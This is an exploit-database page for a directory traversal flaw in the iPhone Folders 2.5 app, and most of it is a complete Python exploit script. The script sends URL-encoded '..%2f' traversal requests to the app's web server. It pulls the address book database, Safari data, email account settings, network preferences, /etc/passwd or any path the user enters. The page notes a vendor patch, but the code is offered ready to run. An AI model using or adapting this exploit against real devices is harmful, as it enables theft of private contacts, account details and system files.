header-logo
Suggest Exploit
vendor:
iPhone Folders
by:
Khashayar Fereidani
8.8
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: iPhone Folders
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:apple:iphone_folders
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iPhone 4 (IOS 4.0.1)
2011

iPhone Folders 2.5 Directory Traversal

This exploit allows an attacker to access sensitive files on an iPhone running iPhone Folders 2.5. The exploit uses a directory traversal vulnerability to access files such as the AddressBook.sqlitedb, Safari favorites, user email info, network info, and the passwd file. The exploit is written in Python and requires the user to enter the address of the iPhone and the file they wish to access.

Mitigation:

The vendor has released an update to address this vulnerability.
Source

Exploit-DB raw data:

----------------------------------------------------------------
Software : iPhone Folders 2.5
Type of vunlnerability : Directory Traversal
Tested On : iPhone 4 (IOS 4.0.1)
Risk of use : High
----------------------------------------------------------------
Program Developer : http://itunes.apple.com/app/folders-private-file-storage/id287950258?mt=8
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

Exploit:

#!/usr/bin/python
import urllib2
def urlread(url,file):
	url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
	u = urllib2.urlopen(url)
	localFile = open('result.html', 'w')
	localFile.write(u.read())
	localFile.close()
	print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone Folders 2.5 DT                 -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
	url='http://'+url
if ((id>0) and (id<6)):
	file=f[id]
	urlread(url,file)
if (id==6):
	file=raw_input("Enter Local File Address : ")
	urlread(url,file)

Navigation

Suggest Exploit

Services By CQR